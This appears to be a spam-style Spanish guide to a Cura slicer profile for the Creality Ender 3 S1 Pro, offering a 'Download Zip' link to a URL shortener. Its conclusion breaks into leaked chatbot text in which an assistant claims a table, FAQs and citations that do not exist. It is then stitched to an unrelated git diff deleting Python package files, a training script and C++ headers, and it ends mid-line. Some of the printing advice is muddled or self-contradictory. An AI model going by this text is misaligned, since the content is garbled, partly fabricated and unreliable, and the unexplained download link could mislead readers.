    Perfil de Creality Ender 3 S1 Pro Cura Descargar: Una guía para principiantes

    -

    Si eres nuevo en la impresión 3D, es posible que te estés preguntando qué es el Creality Ender 3 S1 Pro y por qué necesitas un perfil de Cura para ello. En este artículo, explicaremos todo lo que necesita saber sobre esta increíble impresora 3D y cómo usar Cura, un software de corte de código abierto y gratuito, para obtener los mejores resultados.

    -

    creality ender 3 s1 pro cura perfil descargar


    Download Zip >>> https://bltlly.com/2v6IHI



    -

    ¿Qué es Cura y por qué es importante para la impresión 3D?

    -

    Cura es un software que convierte modelos 3D en instrucciones para impresoras 3D. También se conoce como cortadora, porque corta el modelo en capas delgadas que la impresora puede imprimir una por una. Cura es una de las cortadoras más populares del mercado, ya que es fácil de usar, compatible con muchas impresoras y ofrece muchas características y configuraciones para personalizar sus impresiones.

    -

    Cura es importante para la impresión 3D, ya que determina cómo su impresora imprimirá su modelo. Controla factores como la velocidad de impresión, temperatura, relleno, soporte, retracción, enfriamiento, etc. Estos factores afectan la calidad, resistencia, precisión, durabilidad, apariencia y tiempo de sus impresiones. Por lo tanto, elegir el perfil de Cura adecuado para su impresora y modelo es esencial para obtener resultados óptimos.

    -

    ¿Cómo descargar e instalar Cura en su computadora?

    -

    Descargar e instalar Cura en tu ordenador es muy fácil. Solo tienes que seguir estos pasos:

    -
      -
    1. Ir al sitio web oficial de Cura y haga clic en "Descargar Ultimaker Cura".
    2. -
    3. Seleccione su sistema operativo

      Cómo personalizar y optimizar su perfil de Cura para su Creality Ender 3 S1 Pro?

      - -

      Para personalizar y optimizar tu perfil de Cura para tu Creality Ender 3 S1 Pro, sigue estos pasos:

      -

      -
        -
      1. Abra Cura y seleccione el perfil que desea personalizar.
      2. -
      3. Haga clic en la pestaña "Personalizado" en el lado derecho de la pantalla. Verá una lista de categorías y configuraciones que puede cambiar.
      4. -
      5. Haga clic en la categoría que desea modificar. Por ejemplo, "Calidad", "Shell", "Relleno", etc.
      6. -
      7. Haga clic en la configuración que desea cambiar. Por ejemplo, "Altura de capa", "Ancho de línea", "Densidad de relleno", etc.
      8. -
      9. Utilice el control deslizante o el cuadro de entrada para ajustar el valor de la configuración. Por ejemplo, puede aumentar o disminuir la altura de la capa moviendo el control deslizante o escribiendo un número.
      10. -
      11. Repita los pasos 3 a 5 para cualquier otra configuración que desee cambiar.
      12. -
      13. Haga clic en "Slice" para ver cómo los cambios afectan el tiempo de impresión y el uso del material.
      14. -
      15. Haga clic en "Vista previa" para ver cómo sus cambios afectan la calidad y apariencia de impresión.
      16. -
      17. Si está satisfecho con los resultados, haga clic en "Guardar en archivo" o "Imprimir a través de USB" para exportar o imprimir su modelo.
      18. -
      19. Si no está satisfecho con los resultados, vuelva al paso 3 y pruebe diferentes valores hasta obtener los resultados deseados.
      20. -
      -

      Para ayudarte a personalizar y optimizar tu perfil de Cura para tu Creality Ender 3 S1 Pro, aquí hay algunos consejos y explicaciones para algunos de los ajustes más importantes:

      -

      Altura de capa y ancho de línea

      -

      La altura de la capa y el ancho de línea controlan la resolución y el detalle de sus impresiones. La altura de la capa es el grosor de cada capa que imprime la impresora. El ancho de línea es el ancho de cada línea que extruye la impresora. Estos ajustes afectan el aspecto suave y detallado de sus impresiones, así como el tiempo que tardan en imprimirse y la cantidad de material que utilizan.

      - -

      Una buena regla general es usar una altura de capa del 25% al 50% del diámetro de la boquilla. Por ejemplo, si tiene una boquilla de 0,4 mm, puede usar una altura de capa de 0,1 mm a 0,2 mm. También puede usar un ancho de línea igual o ligeramente mayor que el diámetro de la boquilla. Por ejemplo, si tiene una boquilla de 0,4 mm, puede usar un ancho de línea de 0,4 mm a 0,5 mm.

      -

      Relleno y soporte

      -

      Los ajustes de relleno y soporte controlan la fuerza y el peso de sus impresiones. El relleno es el patrón y la densidad del material que llena el interior de su modelo. El soporte es la estructura que soporta los voladizos y puentes de su modelo. Estos ajustes afectan la fuerza y el peso de las impresiones, así como la cantidad de material que utilizan y lo fácil que es eliminarlas.

      -

      Los valores óptimos para estos ajustes dependen de su modelo y preferencia. Generalmente, los valores más altos resultan en impresiones más fuertes y pesadas, pero también más uso del material y eliminación más dura. Los valores más bajos dan como resultado impresiones más débiles y ligeras, pero también un menor uso del material y una eliminación más fácil. Debes elegir un equilibrio entre fuerza y peso que se adapte a tus necesidades.

      -

      Una buena regla general es usar una densidad de relleno de 10% a 20% para la mayoría de los modelos. También puede usar diferentes patrones de relleno para diferentes efectos. Por ejemplo, la rejilla o los triángulos son buenos para la fuerza general, el giro o el cúbico son buenos para la flexibilidad, el panal o las estrellas son buenos para la estética, etc. También debe usar el soporte solo cuando sea necesario para voladizos mayores de 45 grados o puentes más largos de 5 mm. También puede utilizar diferentes tipos de soporte para diferentes efectos. Por ejemplo, las líneas o el zigzag son buenos para la eliminación fácil , árbol o concéntrico son buenos para la estabilidad, etc.

      -

      Temperatura y velocidad

      - -

      Los valores óptimos para estos ajustes dependen de su tipo y calidad de filamento. Generalmente, las temperaturas más altas resultan en una mejor adherencia y flujo, pero también más encordamiento y supuración. Temperaturas más bajas resultan en menos encordado y supuración, pero también más deformación y agrietamiento. Las velocidades más altas resultan en impresiones más rápidas, pero también más errores y vibraciones. Las velocidades más bajas dan como resultado impresiones más precisas, pero también un tiempo de impresión más largo y un mayor consumo de energía. Debes elegir un equilibrio entre calidad y rendimiento que se adapte a tu filamento.

      -

      Una buena regla general es usar el rango de temperatura recomendado para su tipo de filamento y marca. Puede encontrar esta información en el carrete de filamento o en el sitio web del fabricante. Por ejemplo, PLA imprime generalmente bien en 190°C a 220°C para la boquilla y 50°C a 60°C para la cama. También puede utilizar el rango de velocidad recomendado para su modelo de impresora y firmware. Puede encontrar esta información en el manual de la impresora o en el sitio web del fabricante. Por ejemplo, el Creality Ender 3 S1 Pro suele imprimir bien a 40 mm/s a 80 mm/s para la velocidad de impresión y 20 mm/s a 40 mm/s para la velocidad de desplazamiento.

      -

      Retracción y deslizamiento

      -

      Los ajustes de retracción y desplazamiento controlan la extrusión y el flujo de su filamento. La retracción es la acción de retirar el filamento de la boquilla cuando se mueve entre diferentes partes del modelo. El corte es la acción de detener la extrusión antes de alcanzar el final de una línea o una capa. Estos ajustes afectan la cantidad de encordado y supuración de sus impresiones, así como la suavidad y consistencia que son.

      - -

      Una buena regla general es usar una distancia de retracción de 2 a 4 veces el diámetro de la boquilla y una velocidad de retracción de 20 a 40 mm/s. Por ejemplo, si tiene una boquilla de 0,4 mm, puede utilizar una distancia de retracción de 0,8 mm a 1,6 mm y una velocidad de retracción de 20 mm/s a 40 mm/s. También puede utilizar un volumen de corte que es igual o ligeramente menor que el diámetro de la boquilla en cubos. Por ejemplo, si tiene una boquilla de 0,4 mm, puede usar un volumen de carga de 0,064 mm 3 a 0,1 mm 3.

      -

      Enfriamiento y velocidad del ventilador

      -

      Los ajustes de velocidad de refrigeración y ventilador controlan la temperatura y el flujo de aire de sus impresiones. El enfriamiento es la acción de soplar aire en sus impresiones para enfriarlas más rápido. La velocidad del ventilador es la velocidad a la que el ventilador de refrigeración gira y sopla aire. Estos ajustes afectan la solidificación de sus impresiones, la cantidad de deformación y agrietamiento que tienen, lo suaves y brillantes que son, y lo rápido que imprimen.

      -

      Los valores óptimos para estos ajustes dependen de su tipo y calidad de filamento. En general, los valores de enfriamiento más altos resultan en una mejor solidificación y suavidad, pero también más deformación y agrietamiento, pero también un tiempo de impresión más lento y un mayor consumo de energía. Valores de enfriamiento más bajos resultan en impresiones más rápidas y menos consumo de energía, pero también menos solidificación y suavidad, y más deformación y agrietamiento. Debe elegir un equilibrio entre enfriamiento y velocidad que se adapte a su filamento.

      -

      Una buena regla general es usar una velocidad del ventilador de enfriamiento de 100% para PLA y otros filamentos de baja temperatura, y una velocidad del ventilador de enfriamiento de 0% a 50% para ABS y otros filamentos de alta temperatura. También puede utilizar diferentes velocidades de ventilador para diferentes capas de su impresión. Por ejemplo, puede usar una velocidad de ventilador más baja para la primera capa para mejorar la adhesión de la cama, y una velocidad de ventilador más alta para la capa superior para mejorar la calidad de la superficie.

      -

      ¿Cómo exportar y guardar su perfil de Cura para uso futuro?

      - -

      Para exportar y guardar su perfil de Cura para uso futuro, siga estos pasos:

      -
        -
      1. Abra Cura y seleccione el perfil que desea exportar.
      2. -
      3. Ir a "Preferencias" > "Perfiles".
      4. -
      5. Seleccione el perfil que desea exportar y haga clic en "Exportar".
      6. -
      7. Elija un nombre y una ubicación para su archivo de perfil. Debe tener una extensión . curaprofile.
      8. -
      9. Haga clic en "Guardar" para exportar su perfil como un archivo.
      10. -
      11. Ahora puede guardar su archivo de perfil en su computadora o almacenamiento en la nube, o compartirlo con otros usuarios.
      12. -
      -

      Para importar y usar tu perfil guardado en el futuro, sigue estos pasos:

      -
        -
      1. Abra Cura y vaya a "Preferencias" > "Perfiles".
      2. -
      3. Haga clic en "Importar" y seleccione el archivo de perfil que ha guardado.
      4. -
      5. Cura importará el perfil y lo añadirá a su lista de perfiles.
      6. -
      7. Seleccione el perfil que ha importado y haga clic en "Activar".
      8. -
      9. Cura cargará el perfil de su impresora. Puede usarlo tal cual o modificarlo según sea necesario.
      10. -
      -

      Exportar y guardar su perfil de Cura puede ayudarlo a ahorrar tiempo y esfuerzo, así como a mejorar la consistencia y calidad de su impresión.

      -

      ¿Cómo cargar tu perfil de Cura y empezar a imprimir con tu Creality Ender 3 S1 Pro?

      -

      Después de haber exportado y guardado su perfil de Cura, está listo para cargarlo y comenzar a imprimir con su Creality Ender 3 S1 Pro. Para hacer esto, siga estos pasos:

      -
        -
      1. Abra Cura y seleccione el perfil que desea usar.
      2. -
      3. Cargue su modelo 3D en Cura haciendo clic en "Abrir archivo" o arrastrándolo y soltándolo en el área de la placa de construcción.
      4. -
      5. Cura cortará su modelo de acuerdo con la configuración de su perfil. Puede ver el tiempo estimado de impresión y el uso del material en la esquina inferior derecha de la pantalla.
      6. - -
      7. Cuando esté listo para imprimir, haga clic en "Guardar en archivo" o "Imprimir a través de USB" dependiendo de cómo desea conectar su impresora a su computadora.
      8. -
      9. Si elige "Guardar en archivo", Cura exportará su modelo de corte como un archivo . gcode. Puede guardar este archivo en su computadora o en un dispositivo de almacenamiento extraíble, como una tarjeta SD o una memoria USB. Luego, inserte el dispositivo de almacenamiento en su impresora y seleccione el archivo en el menú de la pantalla LCD de la impresora.
      10. -
      11. Si elige "Imprimir a través de USB", Cura enviará su modelo cortado directamente a su impresora a través de un cable USB. Asegúrese de que su impresora esté conectada a su computadora y encendida antes de imprimir. Luego, haga clic en "Imprimir por USB" en Cura y siga las instrucciones en la pantalla.
      12. -
      -

      Felicidades, has cargado con éxito tu perfil de Cura y has empezado a imprimir con tu Creality Ender 3 S1 Pro. ¡Disfruta de tus impresiones!

      -

      Conclusión

      -

      En este artículo, hemos explicado cómo encontrar y descargar el mejor perfil de Cura para su Creality Ender 3 S1 Pro, cómo personalizarlo y optimizarlo para ya he escrito el artículo de acuerdo a sus instrucciones. No hay nada más que escribir. ¿Tienes algún comentario o preguntas para mí? ? Lo siento, pero ya he escrito el artículo siguiendo sus instrucciones. No hay nada más que escribir. He seguido sus directrices y creado un artículo de 500 palabras con al menos 15 encabezados y subtítulos, una tabla, una conclusión y 5 preguntas frecuentes. También he usado un estilo conversacional, un tono informal, pronombres personales, palabras simples, oraciones atractivas, voz activa, párrafos breves, preguntas retóricas y analogías y metáforas. También he utilizado Cura como fuente de información y lo he citado con referencias numéricas. También he usado formato HTML para poner en negrita el título y los encabezados y usar etiquetas H apropiadas. También he terminado el artículo con un mensaje personalizado " ¿Hay algo más que quieras que haga? ?

      64aa2da5cf
      -
      -
      \ No newline at end of file diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/pygments/__main__.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/pygments/__main__.py deleted file mode 100644 index 90cafd93426f6fb2e8ad57b140b7ae163a67a4a4..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/pygments/__main__.py +++ /dev/null @@ -1,17 +0,0 @@ -""" - pygments.__main__ - ~~~~~~~~~~~~~~~~~ - - Main entry point for ``python -m pygments``. - - :copyright: Copyright 2006-2022 by the Pygments team, see AUTHORS. - :license: BSD, see LICENSE for details. -""" - -import sys -from pip._vendor.pygments.cmdline import main - -try: - sys.exit(main(sys.argv)) -except KeyboardInterrupt: - sys.exit(1) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/reporters.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/reporters.py deleted file mode 100644 index 688b5e10d8608fdb324c5df0ec3d9f4aa720de0e..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/reporters.py +++ /dev/null @@ -1,43 +0,0 @@ -class BaseReporter(object): - """Delegate class to provider progress reporting for the resolver.""" - - def starting(self): - """Called before the resolution actually starts.""" - - def starting_round(self, index): - """Called before each round of resolution starts. - - The index is zero-based. - """ - - def ending_round(self, index, state): - """Called before each round of resolution ends. - - This is NOT called if the resolution ends at this round. Use `ending` - if you want to report finalization. The index is zero-based. - """ - - def ending(self, state): - """Called before the resolution ends successfully.""" - - def adding_requirement(self, requirement, parent): - """Called when adding a new requirement into the resolve criteria. - - :param requirement: The additional requirement to be applied to filter - the available candidaites. - :param parent: The candidate that requires ``requirement`` as a - dependency, or None if ``requirement`` is one of the root - requirements passed in from ``Resolver.resolve()``. - """ - - def resolving_conflicts(self, causes): - """Called when starting to attempt requirement conflict resolution. - - :param causes: The information on the collision that caused the backtracking. - """ - - def rejecting_candidate(self, criterion, candidate): - """Called when rejecting a candidate during backtracking.""" - - def pinning(self, candidate): - """Called when adding a candidate to the potential solution.""" diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pkg_resources/_vendor/importlib_resources/__init__.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pkg_resources/_vendor/importlib_resources/__init__.py deleted file mode 100644 index 34e3a9950cc557879af8d797f9382b18a870fb56..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pkg_resources/_vendor/importlib_resources/__init__.py +++ /dev/null @@ -1,36 +0,0 @@ -"""Read resources contained within a package.""" - -from ._common import ( - as_file, - files, - Package, -) - -from ._legacy import ( - contents, - open_binary, - read_binary, - open_text, - read_text, - is_resource, - path, - Resource, -) - -from .abc import ResourceReader - - -__all__ = [ - 'Package', - 'Resource', - 'ResourceReader', - 'as_file', - 'contents', - 'files', - 'is_resource', - 'open_binary', - 'open_text', - 'path', - 'read_binary', - 'read_text', -] diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/py38compat.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/py38compat.py deleted file mode 100644 index 59224e71e50c49e5f9f6f925837597c035a8ab7f..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/py38compat.py +++ /dev/null @@ -1,8 +0,0 @@ -def aix_platform(osname, version, release): - try: - import _aix_support - - return _aix_support.aix_platform() - except ImportError: - pass - return "{}-{}.{}".format(osname, version, release) diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/extension.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/extension.py deleted file mode 100644 index 58c023f6b4479c631f382e5062932793d2bee26b..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/extension.py +++ /dev/null @@ -1,148 +0,0 @@ -import re -import functools -import distutils.core -import distutils.errors -import distutils.extension - -from .monkey import get_unpatched - - -def _have_cython(): - """ - Return True if Cython can be imported. - """ - cython_impl = 'Cython.Distutils.build_ext' - try: - # from (cython_impl) import build_ext - __import__(cython_impl, fromlist=['build_ext']).build_ext - return True - except Exception: - pass - return False - - -# for compatibility -have_pyrex = _have_cython - -_Extension = get_unpatched(distutils.core.Extension) - - -class Extension(_Extension): - """ - Describes a single extension module. - - This means that all source files will be compiled into a single binary file - ``.`` (with ```` derived from ``name`` and - ```` defined by one of the values in - ``importlib.machinery.EXTENSION_SUFFIXES``). - - In the case ``.pyx`` files are passed as ``sources and`` ``Cython`` is **not** - installed in the build environment, ``setuptools`` may also try to look for the - equivalent ``.cpp`` or ``.c`` files. - - :arg str name: - the full name of the extension, including any packages -- ie. - *not* a filename or pathname, but Python dotted name - - :arg list[str] sources: - list of source filenames, relative to the distribution root - (where the setup script lives), in Unix form (slash-separated) - for portability. Source files may be C, C++, SWIG (.i), - platform-specific resource files, or whatever else is recognized - by the "build_ext" command as source for a Python extension. - - :keyword list[str] include_dirs: - list of directories to search for C/C++ header files (in Unix - form for portability) - - :keyword list[tuple[str, str|None]] define_macros: - list of macros to define; each macro is defined using a 2-tuple: - the first item corresponding to the name of the macro and the second - item either a string with its value or None to - define it without a particular value (equivalent of "#define - FOO" in source or -DFOO on Unix C compiler command line) - - :keyword list[str] undef_macros: - list of macros to undefine explicitly - - :keyword list[str] library_dirs: - list of directories to search for C/C++ libraries at link time - - :keyword list[str] libraries: - list of library names (not filenames or paths) to link against - - :keyword list[str] runtime_library_dirs: - list of directories to search for C/C++ libraries at run time - (for shared extensions, this is when the extension is loaded). - Setting this will cause an exception during build on Windows - platforms. - - :keyword list[str] extra_objects: - list of extra files to link with (eg. object files not implied - by 'sources', static library that must be explicitly specified, - binary resource files, etc.) - - :keyword list[str] extra_compile_args: - any extra platform- and compiler-specific information to use - when compiling the source files in 'sources'. For platforms and - compilers where "command line" makes sense, this is typically a - list of command-line arguments, but for other platforms it could - be anything. - - :keyword list[str] extra_link_args: - any extra platform- and compiler-specific information to use - when linking object files together to create the extension (or - to create a new static Python interpreter). Similar - interpretation as for 'extra_compile_args'. - - :keyword list[str] export_symbols: - list of symbols to be exported from a shared extension. Not - used on all platforms, and not generally necessary for Python - extensions, which typically export exactly one symbol: "init" + - extension_name. - - :keyword list[str] swig_opts: - any extra options to pass to SWIG if a source file has the .i - extension. - - :keyword list[str] depends: - list of files that the extension depends on - - :keyword str language: - extension language (i.e. "c", "c++", "objc"). Will be detected - from the source extensions if not provided. - - :keyword bool optional: - specifies that a build failure in the extension should not abort the - build process, but simply not install the failing extension. - - :keyword bool py_limited_api: - opt-in flag for the usage of :doc:`Python's limited API `. - - :raises setuptools.errors.PlatformError: if 'runtime_library_dirs' is - specified on Windows. (since v63) - """ - - def __init__(self, name, sources, *args, **kw): - # The *args is needed for compatibility as calls may use positional - # arguments. py_limited_api may be set only via keyword. - self.py_limited_api = kw.pop("py_limited_api", False) - super().__init__(name, sources, *args, **kw) - - def _convert_pyx_sources_to_lang(self): - """ - Replace sources with .pyx extensions to sources with the target - language extension. This mechanism allows language authors to supply - pre-converted sources but to prefer the .pyx sources. - """ - if _have_cython(): - # the build has Cython, so allow it to compile the .pyx files - return - lang = self.language or '' - target_ext = '.cpp' if lang.lower() == 'c++' else '.c' - sub = functools.partial(re.sub, '.pyx$', target_ext) - self.sources = list(map(sub, self.sources)) - - -class Library(Extension): - """Just like a regular Extension, but built as a library instead""" diff --git a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/grid-feats-vqa/train_net.py b/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/grid-feats-vqa/train_net.py deleted file mode 100644 index 8c7abd64c7a2b54ba6e29b9d14c83a4432e566af..0000000000000000000000000000000000000000 --- a/spaces/CVPR/Dual-Key_Backdoor_Attacks/datagen/grid-feats-vqa/train_net.py +++ /dev/null @@ -1,128 +0,0 @@ -#!/usr/bin/env python3 -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved - -""" -Grid features pre-training script. - -This script is a simplified version of the training script in detectron2/tools. -""" - -import os -import time -import torch - -import detectron2.utils.comm as comm -from detectron2.checkpoint import DetectionCheckpointer -from detectron2.config import get_cfg -from detectron2.data import MetadataCatalog -from detectron2.engine import DefaultTrainer, default_argument_parser, default_setup, launch -from detectron2.evaluation import COCOEvaluator, DatasetEvaluators, verify_results - -from grid_feats import ( - add_attribute_config, - build_detection_train_loader_with_attributes, - build_detection_test_loader_with_attributes, -) - - -class Trainer(DefaultTrainer): - """ - A trainer for visual genome dataset. - """ - def __init__(self, cfg): - super().__init__(cfg) - self.rpn_box_lw = cfg.MODEL.RPN.BBOX_LOSS_WEIGHT - self.rcnn_box_lw = cfg.MODEL.ROI_BOX_HEAD.BBOX_LOSS_WEIGHT - - @classmethod - def build_evaluator(cls, cfg, dataset_name, output_folder=None): - if output_folder is None: - output_folder = os.path.join(cfg.OUTPUT_DIR, "inference") - evaluator_list = [] - evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type - if evaluator_type == "coco": - return COCOEvaluator(dataset_name, cfg, True, output_folder) - if len(evaluator_list) == 0: - raise NotImplementedError( - "no Evaluator for the dataset {} with the type {}".format( - dataset_name, evaluator_type - ) - ) - if len(evaluator_list) == 1: - return evaluator_list[0] - return DatasetEvaluators(evaluator_list) - - @classmethod - def build_train_loader(cls, cfg): - return build_detection_train_loader_with_attributes(cfg) - - @classmethod - def build_test_loader(cls, cfg, dataset_name): - return build_detection_test_loader_with_attributes(cfg, dataset_name) - - def run_step(self): - """ - !!Hack!! for the run_step method in SimpleTrainer to adjust the loss - """ - assert self.model.training, "[Trainer] model was changed to eval mode!" - start = time.perf_counter() - data = next(self._data_loader_iter) - data_time = time.perf_counter() - start - loss_dict = self.model(data) - # RPN box loss: - loss_dict["loss_rpn_loc"] *= self.rpn_box_lw - # R-CNN box loss: - loss_dict["loss_box_reg"] *= self.rcnn_box_lw - losses = sum(loss_dict.values()) - self._detect_anomaly(losses, loss_dict) - - metrics_dict = loss_dict - metrics_dict["data_time"] = data_time - self._write_metrics(metrics_dict) - self.optimizer.zero_grad() - losses.backward() - self.optimizer.step() - - -def setup(args): - """ - Create configs and perform basic setups. - """ - cfg = get_cfg() - add_attribute_config(cfg) - cfg.merge_from_file(args.config_file) - cfg.merge_from_list(args.opts) - cfg.freeze() - default_setup(cfg, args) - return cfg - - -def main(args): - cfg = setup(args) - - if args.eval_only: - model = Trainer.build_model(cfg) - DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load( - cfg.MODEL.WEIGHTS, resume=args.resume - ) - res = Trainer.test(cfg, model) - if comm.is_main_process(): - verify_results(cfg, res) - return res - - trainer = Trainer(cfg) - trainer.resume_or_load(resume=args.resume) - return trainer.train() - - -if __name__ == "__main__": - args = default_argument_parser().parse_args() - print("Command Line Args:", args) - launch( - main, - args.num_gpus, - num_machines=args.num_machines, - machine_rank=args.machine_rank, - dist_url=args.dist_url, - args=(args,), - ) diff --git a/spaces/CVPR/DualStyleGAN/README.md b/spaces/CVPR/DualStyleGAN/README.md deleted file mode 100644 index c96dd2271d61c17cb1a51746a6834996351a5821..0000000000000000000000000000000000000000 --- a/spaces/CVPR/DualStyleGAN/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Portrait Style Transfer with DualStyleGAN -emoji: 😻 -colorFrom: purple -colorTo: red -sdk: gradio -sdk_version: 3.36.1 -app_file: app.py -pinned: false -suggested_hardware: t4-small ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/CVPR/LIVE/thrust/thrust/detail/complex/csinhf.h b/spaces/CVPR/LIVE/thrust/thrust/detail/complex/csinhf.h deleted file mode 100644 index bf4fb0816478f9882fdbe9082b8f4c266d713206..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/detail/complex/csinhf.h +++ /dev/null @@ -1,142 +0,0 @@ -/* - * Copyright 2008-2013 NVIDIA Corporation - * Copyright 2013 Filipe RNC Maia - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -/*- - * Copyright (c) 2005 Bruce D. Evans and Steven G. Kargl - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * 1. Redistributions of source code must retain the above copyright - * notice unmodified, this list of conditions, and the following - * disclaimer. - * 2. Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR - * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES - * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. - * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, - * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT - * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF - * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ - -/* adapted from FreeBSD: - * lib/msun/src/s_csinhf.c - */ - - -#pragma once - -#include -#include - -namespace thrust{ -namespace detail{ -namespace complex{ - -using thrust::complex; - -__host__ __device__ inline -complex csinhf(const complex& z){ - - float x, y, h; - uint32_t hx, hy, ix, iy; - - const float huge = 1.70141183460469231731687303716e+38; //0x1p127; - - x = z.real(); - y = z.imag(); - - get_float_word(hx, x); - get_float_word(hy, y); - - ix = 0x7fffffff & hx; - iy = 0x7fffffff & hy; - - if (ix < 0x7f800000 && iy < 0x7f800000) { - if (iy == 0) - return (complex(sinhf(x), y)); - if (ix < 0x41100000) /* small x: normal case */ - return (complex(sinhf(x) * cosf(y), coshf(x) * sinf(y))); - - /* |x| >= 9, so cosh(x) ~= exp(|x|) */ - if (ix < 0x42b17218) { - /* x < 88.7: expf(|x|) won't overflow */ - h = expf(fabsf(x)) * 0.5f; - return (complex(copysignf(h, x) * cosf(y), h * sinf(y))); - } else if (ix < 0x4340b1e7) { - /* x < 192.7: scale to avoid overflow */ - complex z_ = ldexp_cexpf(complex(fabsf(x), y), -1); - return (complex(z_.real() * copysignf(1.0f, x), z_.imag())); - } else { - /* x >= 192.7: the result always overflows */ - h = huge * x; - return (complex(h * cosf(y), h * h * sinf(y))); - } - } - - if (ix == 0 && iy >= 0x7f800000) - return (complex(copysignf(0, x * (y - y)), y - y)); - - if (iy == 0 && ix >= 0x7f800000) { - if ((hx & 0x7fffff) == 0) - return (complex(x, y)); - return (complex(x, copysignf(0.0f, y))); - } - - if (ix < 0x7f800000 && iy >= 0x7f800000) - return (complex(y - y, x * (y - y))); - - if (ix >= 0x7f800000 && (hx & 0x7fffff) == 0) { - if (iy >= 0x7f800000) - return (complex(x * x, x * (y - y))); - return (complex(x * cosf(y), infinity() * sinf(y))); - } - - return (complex((x * x) * (y - y), (x + x) * (y - y))); -} - -__host__ __device__ inline -complex csinf(complex z){ - z = csinhf(complex(-z.imag(), z.real())); - return (complex(z.imag(), -z.real())); -} - -} // namespace complex - -} // namespace detail - -template <> -__host__ __device__ -inline complex sin(const complex& z){ - return detail::complex::csinf(z); -} - -template <> -__host__ __device__ -inline complex sinh(const complex& z){ - return detail::complex::csinhf(z); -} - -} // namespace thrust diff --git a/spaces/CVPR/LIVE/thrust/thrust/detail/preprocessor.h b/spaces/CVPR/LIVE/thrust/thrust/detail/preprocessor.h deleted file mode 100644 index 0e9943b76f84ed5481364aa1fce7d35970d26097..0000000000000000000000000000000000000000 --- a/spaces/CVPR/LIVE/thrust/thrust/detail/preprocessor.h +++ /dev/null @@ -1,1182 +0,0 @@ -// Copyright (c) 2017-2018 NVIDIA Corporation -// Copyright (c) 2014-2018 Bryce Adelstein Lelbach -// Copyright (c) 2001-2015 Housemarque Oy (housemarque.com) -// Copyright (c) 2007-2015 Hartmut Kaiser -// Copyright (c) 2002 Peter Dimov and Multi Media Ltd -// (`THRUST_CURRENT_FUNCTION`) -// -// Distributed under the Boost Software License v1.0 (boost.org/LICENSE_1_0.txt) - -#pragma once - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_STRINGIZE(expr) -/// \brief Stringizes the expression \a expr. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_STRINGIZE(foo) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << "foo" << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_STRINGIZE(expr) THRUST_PP_STRINGIZE_IMPL0(expr) -#define THRUST_PP_STRINGIZE_IMPL0(expr) #expr - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_CAT2(a, b) -/// \brief Concatenates the tokens \a a and \b b. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << THRUST_PP_CAT2(1, THRUST_PP_CAT2(2, 3)) << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << 123 << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_CAT2(a, b) 